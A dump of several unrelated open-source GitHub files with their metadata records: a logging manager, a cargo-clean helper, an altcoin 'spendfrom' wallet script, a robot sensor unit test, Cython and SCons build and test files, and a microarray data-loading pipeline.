mock.created = 1482583310
mock.image = "2016/12/24/058d591eb1eddbd3.mp4"
mock.width = 640
mock.height = 360
mock.thumb = "2016/12/24/058d591eb1eddbd3.jpg"
mock.fullsize = ""
mock.source = ""
mock.audio = False
mock.up = 699
mock.down = 11
mock.flags = 1
return mock
|
{
"content_hash": "1cedd2bfb56c2f098fef0b02092fb231",
"timestamp": "",
"source": "github",
"line_count": 145,
"max_line_length": 75,
"avg_line_length": 29.386206896551723,
"alnum_prop": 0.5301572400844872,
"repo_name": "BigPeet/pr0tagger",
"id": "5d0a68a0dba466d8c67216991059ebdf611b0859",
"size": "4261",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/pr0gramm/Item.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "23924"
}
],
"symlink_target": ""
}
|
import logging
_LOG_LEVEL_NOTSET = 'NOTSET'
def get_logger(logger_name):
return _LOGGING_MANAGER.get_logger(logger_name)
def get_log_manager():
return _LOGGING_MANAGER
def _cfg_var_exists(cfg, var_name):
var = None
if isinstance(cfg, dict):
var = cfg.get(var_name)
elif hasattr(cfg, var_name):
var = getattr(cfg, var_name)
return var is not None
class LoggingConfig(object):
def __init__(self):
self.logfile = None
self.level = 'INFO'
self.console_enabled = True
class LoggingManager(object):
def __init__(self):
self._root_logger = logging.getLogger()
self._handlers = list()
def _add_handler(self, handler):
self._handlers.append(handler)
self._root_logger.addHandler(handler)
def _clean_handlers(self):
[self._root_logger.removeHandler(hdlr) for hdlr in self._handlers]
del self._handlers[:]
def configure(self, cfg):
self._clean_handlers()
# Should we write to a logfile?
if _cfg_var_exists(cfg, 'logfile'):
self._add_handler(logging.FileHandler(cfg['logfile']))
# Is console output enabled?
if _cfg_var_exists(cfg, 'console_enabled'):
if cfg['console_enabled'] is True:
self._add_handler(logging.StreamHandler())
# How verbose should we be?
if _cfg_var_exists(cfg, 'level'):
level = cfg['level']
self._root_logger.setLevel(level)
self._root_logger.info('Logging level set to: {level}'.format(
level=level))
def get_logger(self, logger_name):
logger = logging.getLogger(logger_name)
logger.setLevel(_LOG_LEVEL_NOTSET)
return logger
globals()['_LOGGING_MANAGER'] = LoggingManager()
|
{
"content_hash": "9227730df8f7f7d5e7f684b9f85dd01c",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 74,
"avg_line_length": 25.23611111111111,
"alnum_prop": 0.6042927903137039,
"repo_name": "zinic/chuckbox",
"id": "172b0fa3de70d16ecd9e882ed16b7446737c6167",
"size": "1817",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/chuckbox/log.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "15478"
}
],
"symlink_target": ""
}
|
"""
Usage: ./clean_cargo_all <root_dir>
Find all project directories containg a `Cargo.toml` and run
`cargo clean` in them.
"""
import os
import sys
def find_dirs_with_file(root_dir, file_name):
result = []
for root, dirs, files in os.walk(root_dir):
if file_name in files:
result.append(root)
return sorted(result)
def make_clean_cargo_cmd(root_dir):
dirs = find_dirs_with_file(root_dir, "Cargo.toml")
cmds = list(map(lambda d: "cd %s && cargo clean" % d, dirs))
cmds.append("cd %s" % os.getcwd())
return " && \\\n".join(cmds)
if __name__ == "__main__":
root_dir = sys.argv[1]
print("Run the following command:\n")
print(make_clean_cargo_cmd(root_dir))
|
{
"content_hash": "e06fbdebddd409e427d315134fbd72b1",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 64,
"avg_line_length": 26.62962962962963,
"alnum_prop": 0.6203059805285118,
"repo_name": "thorbenk/dotfiles",
"id": "e913a54dda03ea591c93c04a5564442be055f275",
"size": "743",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bin/clean_cargo_all.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Lua",
"bytes": "40401"
},
{
"name": "Python",
"bytes": "3479"
},
{
"name": "Shell",
"bytes": "9831"
},
{
"name": "TeX",
"bytes": "3371"
},
{
"name": "Vim script",
"bytes": "94156"
}
],
"symlink_target": ""
}
|
from decimal import *
import getpass
import math
import os
import os.path
import platform
import sys
import time
from jsonrpc import ServiceProxy, json
BASE_FEE=Decimal("0.001")
def check_json_precision():
"""Make sure json library being used does not lose precision converting BTC values"""
n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n)))*1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError("JSON encode/decode loses precision")
def determine_db_dir():
"""Return the default location of the aspire data directory"""
if platform.system() == "Darwin":
return os.path.expanduser("~/Library/Application Support/Aspire/")
elif platform.system() == "Windows":
return os.path.join(os.environ['APPDATA'], "Aspire")
return os.path.expanduser("~/.aspire")
def read_bitcoin_config(dbdir):
"""Read the aspire.conf file from dbdir, returns dictionary of settings"""
from ConfigParser import SafeConfigParser
class FakeSecHead(object):
def __init__(self, fp):
self.fp = fp
self.sechead = '[all]\n'
def readline(self):
if self.sechead:
try: return self.sechead
finally: self.sechead = None
else:
s = self.fp.readline()
if s.find('#') != -1:
s = s[0:s.find('#')].strip() +"\n"
return s
config_parser = SafeConfigParser()
config_parser.readfp(FakeSecHead(open(os.path.join(dbdir, "aspire.conf"))))
return dict(config_parser.items("all"))
def connect_JSON(config):
"""Connect to a aspire JSON-RPC server"""
testnet = config.get('testnet', '0')
testnet = (int(testnet) > 0) # 0/1 in config file, convert to True/False
if not 'rpcport' in config:
config['rpcport'] = 16179 if testnet else 6179
connect = "http://%s:%s@127.0.0.1:%s"%(config['rpcuser'], config['rpcpassword'], config['rpcport'])
try:
result = ServiceProxy(connect)
# ServiceProxy is lazy-connect, so send an RPC command mostly to catch connection errors,
# but also make sure the aspired we're talking to is/isn't testnet:
if result.getmininginfo()['testnet'] != testnet:
sys.stderr.write("RPC server at "+connect+" testnet setting mismatch\n")
sys.exit(1)
return result
except:
sys.stderr.write("Error connecting to RPC server at "+connect+"\n")
sys.exit(1)
def unlock_wallet(aspired):
info = aspired.getinfo()
if 'unlocked_until' not in info:
return True # wallet is not encrypted
t = int(info['unlocked_until'])
if t <= time.time():
try:
passphrase = getpass.getpass("Wallet is locked; enter passphrase: ")
aspired.walletpassphrase(passphrase, 5)
except:
sys.stderr.write("Wrong passphrase\n")
info = aspired.getinfo()
return int(info['unlocked_until']) > time.time()
def list_available(aspired):
address_summary = dict()
address_to_account = dict()
for info in aspired.listreceivedbyaddress(0):
address_to_account[info["address"]] = info["account"]
unspent = aspired.listunspent(0)
for output in unspent:
# listunspent doesn't give addresses, so:
rawtx = aspired.getrawtransaction(output['txid'], 1)
vout = rawtx["vout"][output['vout']]
pk = vout["scriptPubKey"]
# This code only deals with ordinary pay-to-aspire-address
# or pay-to-script-hash outputs right now; anything exotic is ignored.
if pk["type"] != "pubkeyhash" and pk["type"] != "scripthash":
continue
address = pk["addresses"][0]
if address in address_summary:
address_summary[address]["total"] += vout["value"]
address_summary[address]["outputs"].append(output)
else:
address_summary[address] = {
"total" : vout["value"],
"outputs" : [output],
"account" : address_to_account.get(address, "")
}
return address_summary
def select_coins(needed, inputs):
# Feel free to improve this, this is good enough for my simple needs:
outputs = []
have = Decimal("0.0")
n = 0
while have < needed and n < len(inputs):
outputs.append({ "txid":inputs[n]["txid"], "vout":inputs[n]["vout"]})
have += inputs[n]["amount"]
n += 1
return (outputs, have-needed)
def create_tx(aspired, fromaddresses, toaddress, amount, fee):
all_coins = list_available(aspired)
total_available = Decimal("0.0")
needed = amount+fee
potential_inputs = []
for addr in fromaddresses:
if addr not in all_coins:
continue
potential_inputs.extend(all_coins[addr]["outputs"])
total_available += all_coins[addr]["total"]
if total_available < needed:
sys.stderr.write("Error, only %f BTC available, need %f\n"%(total_available, needed));
sys.exit(1)
#
# Note:
# Python's json/jsonrpc modules have inconsistent support for Decimal numbers.
# Instead of wrestling with getting json.dumps() (used by jsonrpc) to encode
# Decimals, I'm casting amounts to float before sending them to aspired.
#
outputs = { toaddress : float(amount) }
(inputs, change_amount) = select_coins(needed, potential_inputs)
if change_amount > BASE_FEE: # don't bother with zero or tiny change
change_address = fromaddresses[-1]
if change_address in outputs:
outputs[change_address] += float(change_amount)
else:
outputs[change_address] = float(change_amount)
rawtx = aspired.createrawtransaction(inputs, outputs)
signed_rawtx = aspired.signrawtransaction(rawtx)
if not signed_rawtx["complete"]:
sys.stderr.write("signrawtransaction failed\n")
sys.exit(1)
txdata = signed_rawtx["hex"]
return txdata
def compute_amount_in(aspired, txinfo):
result = Decimal("0.0")
for vin in txinfo['vin']:
in_info = aspired.getrawtransaction(vin['txid'], 1)
vout = in_info['vout'][vin['vout']]
result = result + vout['value']
return result
def compute_amount_out(txinfo):
result = Decimal("0.0")
for vout in txinfo['vout']:
result = result + vout['value']
return result
def sanity_test_fee(aspired, txdata_hex, max_fee):
class FeeError(RuntimeError):
pass
try:
txinfo = aspired.decoderawtransaction(txdata_hex)
total_in = compute_amount_in(aspired, txinfo)
total_out = compute_amount_out(txinfo)
if total_in-total_out > max_fee:
raise FeeError("Rejecting transaction, unreasonable fee of "+str(total_in-total_out))
tx_size = len(txdata_hex)/2
kb = tx_size/1000 # integer division rounds down
if kb > 1 and fee < BASE_FEE:
raise FeeError("Rejecting no-fee transaction, larger than 1000 bytes")
if total_in < 0.01 and fee < BASE_FEE:
raise FeeError("Rejecting no-fee, tiny-amount transaction")
# Exercise for the reader: compute transaction priority, and
# warn if this is a very-low-priority transaction
except FeeError as err:
sys.stderr.write((str(err)+"\n"))
sys.exit(1)
def main():
import optparse
parser = optparse.OptionParser(usage="%prog [options]")
parser.add_option("--from", dest="fromaddresses", default=None,
help="addresses to get aspires from")
parser.add_option("--to", dest="to", default=None,
help="address to get send aspires to")
parser.add_option("--amount", dest="amount", default=None,
help="amount to send")
parser.add_option("--fee", dest="fee", default="0.0",
help="fee to include")
parser.add_option("--datadir", dest="datadir", default=determine_db_dir(),
help="location of aspire.conf file with RPC username/password (default: %default)")
parser.add_option("--testnet", dest="testnet", default=False, action="store_true",
help="Use the test network")
parser.add_option("--dry_run", dest="dry_run", default=False, action="store_true",
help="Don't broadcast the transaction, just create and print the transaction data")
(options, args) = parser.parse_args()
check_json_precision()
config = read_bitcoin_config(options.datadir)
if options.testnet: config['testnet'] = True
aspired = connect_JSON(config)
if options.amount is None:
address_summary = list_available(aspired)
for address,info in address_summary.iteritems():
n_transactions = len(info['outputs'])
if n_transactions > 1:
print("%s %.8f %s (%d transactions)"%(address, info['total'], info['account'], n_transactions))
else:
print("%s %.8f %s"%(address, info['total'], info['account']))
else:
fee = Decimal(options.fee)
amount = Decimal(options.amount)
while unlock_wallet(aspired) == False:
pass # Keep asking for passphrase until they get it right
txdata = create_tx(aspired, options.fromaddresses.split(","), options.to, amount, fee)
sanity_test_fee(aspired, txdata, amount*Decimal("0.01"))
if options.dry_run:
print(txdata)
else:
txid = aspired.sendrawtransaction(txdata)
print(txid)
if __name__ == '__main__':
main()
|
{
"content_hash": "7a095cec433a37c18a185bea425d6d65",
"timestamp": "",
"source": "github",
"line_count": 252,
"max_line_length": 111,
"avg_line_length": 38.21031746031746,
"alnum_prop": 0.6147055769031052,
"repo_name": "aspirecoin/aspire",
"id": "51c272ee5ab2bcc2e14bd6bc55319d3c56b9f0e7",
"size": "10004",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "contrib/spendfrom/spendfrom.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "7639"
},
{
"name": "C",
"bytes": "1098258"
},
{
"name": "C++",
"bytes": "5513873"
},
{
"name": "CSS",
"bytes": "122225"
},
{
"name": "HTML",
"bytes": "50621"
},
{
"name": "Java",
"bytes": "2100"
},
{
"name": "M4",
"bytes": "147917"
},
{
"name": "Makefile",
"bytes": "91439"
},
{
"name": "Objective-C",
"bytes": "7279"
},
{
"name": "Objective-C++",
"bytes": "7237"
},
{
"name": "Protocol Buffer",
"bytes": "2308"
},
{
"name": "Python",
"bytes": "713599"
},
{
"name": "QMake",
"bytes": "27053"
},
{
"name": "Roff",
"bytes": "21655"
},
{
"name": "Shell",
"bytes": "55643"
}
],
"symlink_target": ""
}
|
from typing import List, Optional
import unittest
from pyreach import core
from pyreach.common.python import types_gen
from pyreach.force_torque_sensor import ForceTorqueSensorState
from pyreach.impl import force_torque_sensor_impl
from pyreach.impl import test_utils
from pyreach.impl import thread_util
class ForceTorqueSensorImplTest(unittest.TestCase):
def test_test_force_torque_sensor(self) -> None:
test_utils.run_test_client_test([TestForceTorqueSensor("test-name")], [
test_utils.TestResponderStep(
types_gen.CommandData(
ts=1,
device_type="force-torque-sensor",
device_name="test-name",
data_type="frame-request"), (types_gen.DeviceData(
ts=1,
device_type="force-torque-sensor",
device_name="test-name",
data_type="sensor-state",
state=[
types_gen.CapabilityState(pin="fx", float_value=1.0),
types_gen.CapabilityState(pin="fy", float_value=2.0),
types_gen.CapabilityState(pin="fz", float_value=3.0),
types_gen.CapabilityState(pin="tx", float_value=4.0),
types_gen.CapabilityState(pin="ty", float_value=5.0),
types_gen.CapabilityState(pin="tz", float_value=6.0),
]),)),
test_utils.TestResponderStep(
types_gen.CommandData(
ts=1,
device_type="force-torque-sensor",
device_name="test-name",
data_type="frame-request",
tag="test-tag"), (types_gen.DeviceData(
ts=1,
tag="test-tag",
device_type="force-torque-sensor",
device_name="test-name",
data_type="sensor-state",
state=[
types_gen.CapabilityState(pin="fx", float_value=1.0),
types_gen.CapabilityState(pin="fy", float_value=2.0),
types_gen.CapabilityState(pin="fz", float_value=3.0),
types_gen.CapabilityState(pin="tx", float_value=4.0),
types_gen.CapabilityState(pin="ty", float_value=5.0),
types_gen.CapabilityState(pin="tz", float_value=6.0),
]),
types_gen.DeviceData(
ts=1,
device_type="force-torque-sensor",
device_name="test-name",
data_type="cmd-status",
tag="test-tag",
status="done"))),
test_utils.TestResponderStep(
types_gen.CommandData(
ts=1,
device_type="force-torque-sensor",
device_name="test",
data_type="frame-request"), ()),
test_utils.TestResponderStep(
types_gen.CommandData(
ts=1,
device_type="force-torque-sensor",
device_name="",
data_type="frame-request"), ()),
test_utils.TestResponderStep(
types_gen.CommandData(
ts=1,
device_type="test",
device_name="test-name",
data_type="frame-request"), ()),
])
def test_force_torque_sensor(self) -> None:
## Setup, ensure no cached frame, and that tagged requests will be used.
rdev, dev = force_torque_sensor_impl.ForceTorqueSensorDevice(
"test-name").get_wrapper()
with test_utils.TestDevice(rdev) as test_device:
global_callbacks: "thread_util.CallbackCapturer[ForceTorqueSensorState]" = thread_util.CallbackCapturer(
)
stop_callback = dev.add_update_callback(
global_callbacks.callback_false, global_callbacks.finished_callback)
assert dev.state is None
test_device.set_responder(TestForceTorqueSensor("test-name"))
## Get the first state
frame = dev.fetch_state()
test_device.expect_command_data([
types_gen.CommandData(
data_type="frame-request",
device_type="force-torque-sensor",
device_name="test-name")
])
self._verify_state(frame, "test-name")
self._verify_state(dev.state, "test-name")
## ensure cached is the first frame
assert dev.state == frame
## Use callbacks to get the next frames
callback: ("thread_util.DoubleCallbackCapturer[ForceTorqueSensorState, "
"core.PyReachStatus]") = thread_util.DoubleCallbackCapturer()
dev.async_fetch_state(
callback=callback.first_callback_finish,
error_callback=callback.second_callback_finish)
frames = callback.wait()
test_device.expect_command_data([
types_gen.CommandData(
data_type="frame-request",
device_type="force-torque-sensor",
device_name="test-name")
])
assert len(frames) == 1
self._verify_state(frames[0][0], "test-name")
## frame is cached
cached_frame = frames[0][0]
assert dev.state == cached_frame
## set the callback to None to test timeouts
test_device.set_callback(None)
self.assertRaises(core.PyReachError, dev.fetch_state, timeout=0)
test_device.expect_command_data([
types_gen.CommandData(
data_type="frame-request",
device_type="force-torque-sensor",
device_name="test-name")
])
callback = thread_util.DoubleCallbackCapturer()
dev.async_fetch_state(
callback=callback.first_callback_finish,
error_callback=callback.second_callback_finish,
timeout=0)
empty_frames = callback.wait()
assert len(empty_frames) == 1
assert empty_frames[0][0] is None
self._is_timeout(empty_frames[0][1])
test_device.expect_command_data([
types_gen.CommandData(
data_type="frame-request",
device_type="force-torque-sensor",
device_name="test-name")
])
assert dev.state == cached_frame
stop_callback()
global_frames = global_callbacks.wait()
assert len(global_frames) == 2
assert global_frames[0] == frame
assert global_frames[1] == frames[0][0]
def _verify_state(self, state: Optional[ForceTorqueSensorState],
name: str) -> None:
self.assertIsNotNone(state)
if not state:
return
self.assertEqual(state.device_name, name)
self.assertEqual(state.force.x, 1.0)
self.assertEqual(state.force.y, 2.0)
self.assertEqual(state.force.z, 3.0)
self.assertEqual(state.torque.x, 4.0)
self.assertEqual(state.torque.y, 5.0)
self.assertEqual(state.torque.z, 6.0)
def _is_timeout(self, status: Optional[core.PyReachStatus]) -> None:
assert status is not None
assert status.status == "done"
assert status.error == "timeout"
class TestForceTorqueSensor(test_utils.TestResponder):
"""Represents a fake force torque sensor used for testing."""
_device_name: str
def __init__(self, device_name: str) -> None:
"""Init a test depth camera."""
self._device_name = device_name
def _response(self, ts: int, tag: str) -> List[types_gen.DeviceData]:
"""Generate a test response."""
output = [
types_gen.DeviceData(
device_type="force-torque-sensor",
device_name=self._device_name,
ts=ts,
tag=tag,
data_type="sensor-state",
state=[
types_gen.CapabilityState(pin="fx", float_value=1.0),
types_gen.CapabilityState(pin="fy", float_value=2.0),
types_gen.CapabilityState(pin="fz", float_value=3.0),
types_gen.CapabilityState(pin="tx", float_value=4.0),
types_gen.CapabilityState(pin="ty", float_value=5.0),
types_gen.CapabilityState(pin="tz", float_value=6.0),
])
]
if tag:
output.append(
types_gen.DeviceData(
device_type="force-torque-sensor",
device_name=self._device_name,
ts=ts,
tag=tag,
data_type="cmd-status",
status="done"))
return output
def step(self, cmd: types_gen.CommandData) -> List[types_gen.DeviceData]:
"""Test step, generates a response for testing framework data."""
if test_utils.is_frame_request_for(cmd, "force-torque-sensor",
self._device_name):
return self._response(cmd.ts, cmd.tag)
return []
def start(self) -> List[types_gen.DeviceData]:
return []
if __name__ == "__main__":
unittest.main()
|
{
"content_hash": "1dcf5504ddda0cfd2786f2a85cfb02da",
"timestamp": "",
"source": "github",
"line_count": 222,
"max_line_length": 110,
"avg_line_length": 40.3963963963964,
"alnum_prop": 0.5594335414808207,
"repo_name": "google-research/pyreach",
"id": "c15608ae50dd688d02f8adf3e5711cf8a37a8d2f",
"size": "9544",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "pyreach/impl/force_torque_sensor_impl_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "5276899"
},
{
"name": "Shell",
"bytes": "15836"
}
],
"symlink_target": ""
}
|
from distutils.core import setup
from Cython.Build import cythonize
from distutils.extension import Extension
setup(name="APzdtheta", ext_modules=cythonize('aptestmetricdt.pyx'),)
#ext_modules=[Extension("demo",sources=["demo.pyx"],libraries=["m"] # Unix-like specific)]
#setup( name = "Demos",ext_modules = cythonize(ext_modules))
|
{
"content_hash": "a66c493e483a6f700ba9f668d836e8e6",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 90,
"avg_line_length": 37.22222222222222,
"alnum_prop": 0.7611940298507462,
"repo_name": "rohinkumar/galsurveystudy",
"id": "6651afbab612a9c53abb81e65310b6a821d2b2fb",
"size": "335",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "APTest/setupaptest.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Gnuplot",
"bytes": "2421"
},
{
"name": "HTML",
"bytes": "26305"
},
{
"name": "Jupyter Notebook",
"bytes": "204271897"
},
{
"name": "PostScript",
"bytes": "40488"
},
{
"name": "Python",
"bytes": "59235"
},
{
"name": "Shell",
"bytes": "211"
},
{
"name": "TeX",
"bytes": "63471"
}
],
"symlink_target": ""
}
|
#!/usr/bin/env python
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
"""
Test that the $LEXCOMSTR construction variable allows you to customize
the displayed string when lex is called.
"""
import TestSCons
_python_ = TestSCons._python_
test = TestSCons.TestSCons()
test.write('mylex.py', """
import sys
outfile = open(sys.argv[1], 'wb')
for f in sys.argv[2:]:
infile = open(f, 'rb')
for l in [l for l in infile.readlines() if l != '/*lex*/\\n']:
outfile.write(l)
sys.exit(0)
""")
test.write('SConstruct', """
env = Environment(tools=['default', 'lex'],
LEXCOM = r'%(_python_)s mylex.py $TARGET $SOURCES',
LEXCOMSTR = 'Lexing $TARGET from $SOURCE')
env.CFile(target = 'aaa', source = 'aaa.l')
env.CFile(target = 'bbb', source = 'bbb.lex')
""" % locals())
test.write('aaa.l', "aaa.l\n/*lex*/\n")
test.write('bbb.lex', "bbb.lex\n/*lex*/\n")
test.run(stdout = test.wrap_stdout("""\
Lexing aaa.c from aaa.l
Lexing bbb.c from bbb.lex
"""))
test.must_match('aaa.c', "aaa.l\n")
test.must_match('bbb.c', "bbb.lex\n")
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
{
"content_hash": "7aba558c0817bd679523ed23b81857ad",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 73,
"avg_line_length": 29.805194805194805,
"alnum_prop": 0.6910675381263617,
"repo_name": "azatoth/scons",
"id": "83b2f9c002661bdce69c812cd4ee6c50eaf8f227",
"size": "2295",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "test/LEX/LEXCOMSTR.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "259"
},
{
"name": "JavaScript",
"bytes": "17316"
},
{
"name": "Perl",
"bytes": "45214"
},
{
"name": "Python",
"bytes": "6716123"
},
{
"name": "Shell",
"bytes": "2535"
}
],
"symlink_target": ""
}
|
from os.path import join, isfile
from os import unlink
from subprocess import call
from re import compile
from numpy import array, mean, genfromtxt, zeros_like, arange
from sqlalchemy import distinct
from scipy.stats import ttest_ind
from trnlib import settings, timing
from trnlib.omeORM import *
from itertools import combinations
normalize_script = join(settings.trn_directory, "database", "loading", "normalize.R")
def create_translator(session, annotation_file=settings.data_directory + "annotation/GPL3154.tab"):
"""create dict to translate from affy id to database gene wid"""
affyid2wid = {}
bnum2wid = dict(session.query(Gene.bnum, Gene.wid))
bnum_search = compile(r"b\d{4}")
with open(annotation_file) as infile:
for line in infile.readlines():
if line[0] == '#':
continue
vals = line.split('\t')
if bnum_search.match(vals[1]):
try:
affyid2wid[vals[0]] = bnum2wid[vals[1]]
except KeyError:
None
# should not actually look for synonyms
#synonym = session.search_by_synonym(Gene,
# vals[1] + " (obsolete)").first()
#if synonym is not None:
# affyid2wid[vals[0]] = synonym.wid
return affyid2wid, bnum2wid
def create_experiments(session, header_line, experiment_set, platform):
"""create the appropriate experiments
input: header_line from normalize script output with CEL filenames
output: list of created experiment wids"""
experiments = []
cols = header_line.rstrip('\n').split('\t')
for col in cols:
if col == '': continue
vals = col.rstrip('.CEL').split('_')
exp_type = vals[0]
strain = vals[1]
csource = vals[2]
nsource = vals[3]
eacceptor = vals[4]
replicate = int(vals[5])
condition = get_or_create_condition(session, carbon_source=csource,
nitrogen_source=nsource, eacceptor=eacceptor)
strain_object = get_or_create(session, Strain, name=strain)
# link knockout correctly
knockout_gene = session.query(Gene).filter_by(
name=strain.replace("delta-", "")).first()
if knockout_gene is not None:
if knockout_gene not in strain_object.knockouts:
strain_object.knockouts.append(knockout_gene)
session.add(strain_object)
session.commit()
tmp = strain.split('-')
try: target = tmp[1]
except: target = tmp[0]
# TODO make sure the experiment doesn't already exist
# if session.query(Dataset).filter_by(name=col).first() is not None:
# print "already in", session.query(Dataset).filter_by(name=col).first()#raise Exception("already in the database")
dataset = Dataset(name=col)
session.add(dataset)
session.commit()
experiment = ArrayExperiment()
experiment.platform = platform
experiment.condition = condition
experiment.strain = strain_object
experiment.replicate = replicate
experiment.name = col # todo - make link to dataset, and use experiment set
experiment.experiment_set = experiment_set
session.add(experiment)
session.commit()
assert experiment.wid is not None
experiments.append(experiment)
return experiments
def calculate_differential_expression(session, condition1, condition2, strain1, strain2, platform, experiment_set):
"""calculate differential expression (fold change and q)"""
query_args = {"platform": platform, "experiment_set": experiment_set}
bnums = array([i[0] for i in session.query(distinct(ExpressionData.bnum)).\
filter_by(**query_args)])
n_genes = len(bnums)
# query data
d1_query = session.query(ExpressionData.value).filter_by(condition=condition1, strain=strain1, **query_args).order_by(ExpressionData.bnum)
d2_query = session.query(ExpressionData.value).filter_by(condition=condition2, strain=strain2, **query_args).order_by(ExpressionData.bnum)
try:
d1 = array(d1_query.all()).reshape(n_genes, -1)
d2 = array(d2_query.all()).reshape(n_genes, -1)
except:
from IPython import embed; embed()
# filter the data, using the average of all values in the platform file as a cutoff
cutoff = mean(genfromtxt("%s/expression/CEL/IG_formatted_%s.tab" % (settings.data_directory, platform))[:, 1:])
selection = (d1.max(axis=1) > cutoff) + (d2.max(axis=1) > cutoff) # at least one of the samples must have one value over the cutoff
d1 = d1[selection, :]
d2 = d2[selection, :]
bnums = bnums[selection]
# calculate fold change (difference of means)
fold_change = (d1.mean(axis=1) - d2.mean(axis=1))
# calculate t-test statistics
t, p = ttest_ind(d1, d2, axis=1) # independent t-test
# perform Benjamini-Hochberg correction (similar to p.adjust(p_values, method="BH") in R)
n_total = len(p)
ranks = zeros_like(p)
ranks[p.argsort()] = arange(n_total) + 1.0 # ranks must be floats starting with 1
q = p * n_total / ranks # each entry is scaled by n_total / it's rank
q[q > 1] = 1.0 # maximum value is 1
if not q[0] >= 0:
from IPython import embed; embed()
return bnums, fold_change, q
def process_differential_expression(session, experiment_set, platform, experiments=None):
"""determine which experiments to compare with differential expression, then perform them
if no experiments are given, use all of the experiments in the set"""
if experiments is None:
experiments = experiment_set.array_experiments
experiment_conditions = {}
for experiment in experiments:
experiment_conditions[(experiment.strain, experiment.condition)] = experiment.wid
for c in combinations(experiment_conditions.keys(), 2):
e1, e2 = sorted(c, key=str)
s1, c1 = e1
s2, c2 = e2
if s1 == s2: # if the strains are the same
# single shift only
differences = (c1.carbon_source != c2.carbon_source) + \
(c1.nitrogen_source != c2.nitrogen_source) + \
(c1.eacceptor != c2.eacceptor) + \
(c1.other != c2.other) + (c1.temperature != c2.temperature)
if differences != 1:
continue
else: # if the strains are different
if not (s1.name == "wt" or s2.name == "wt"):
continue
if c1 != c2: # make sure the conditions are the same
continue
exp_wid_1 = experiment_conditions[(s1, c1)]
exp_wid_2 = experiment_conditions[(s2, c2)]
r = calculate_differential_expression(session, c1, c2, s1, s2, platform, experiment_set)
upload_differential_expression(session, exp_wid_1, exp_wid_2, *r)
def upload_differential_expression(session, exp_wid_1, exp_wid_2, bnums, fold_change, fdr):
experiments = {"experiment_wid_1": exp_wid_1, "experiment_wid_2": exp_wid_2}
for i in range(len(bnums)):
fc_data = ArrayAnalysis(bnum=bnums[i], type="fold_change", value=fold_change[i], **experiments)
fdr_data = ArrayAnalysis(bnum=bnums[i], type="ttest", value=fdr[i], **experiments)
session.add(fc_data)
session.add(fdr_data)
session.commit()
@timing
def process_array_expression_data(session, folder, platform, experiment_set=None, differential_expression=True):
# first need to normalize the data
normalized_file_path = join(folder, "normalized_data.txt")
if isfile(normalized_file_path):
unlink(normalized_file_path)
call([settings.Rscript, "--slave", normalize_script], cwd=folder)
# make sure the R script worked
if not isfile(normalized_file_path):
raise Exception("R script failed to run")
# create dict to map from
affyid2wid, bnum2wid = create_translator(session)
datafile = open(normalized_file_path)
header = datafile.readline()
experiments = create_experiments(session, header, experiment_set, platform)
# process the datafiles and upload the data
re_search = compile(r"b\d{4}")
for line in datafile.readlines():
gene_wid = None
vals = line.strip().split('\t')
if platform == "asv2":
found_bnums = re_search.findall(vals[0])
if len(found_bnums) == 1:
try:
gene_wid = bnum2wid[found_bnums[0]]
except:
continue
else:
try:
gene_wid = affyid2wid[vals[0]]
except KeyError:
continue # not a gene
if gene_wid is None:
continue
query_str = "INSERT INTO array_data(value, experiment_WID) VALUES"
for i, experiment in enumerate(experiments):
query_str += " (%s, %i)," % (vals[i + 1], experiment.wid)
query_str = query_str.strip(",") + " RETURNING wid;"
array_wids = [i[0] for i in session.execute(query_str).fetchall()]
query_str = "INSERT INTO array_mapping(gene_WID, array_WID) VALUES"
for array_wid in array_wids:
query_str += " (%i, %i)," % (gene_wid, array_wid)
query_str = query_str.strip(",") + ";"
session.execute(query_str)
datafile.close()
session.commit()
unlink(normalized_file_path)
# set up differential expression tests
if differential_expression:
process_differential_expression(session, experiment_set, platform, experiments=experiments)
if __name__ == "__main__":
import os
print "starting reset"
os.system("%s < ../schemas/kb_schema_ome_affy.sql > psql.log 2>&1" % (settings.psql_full))
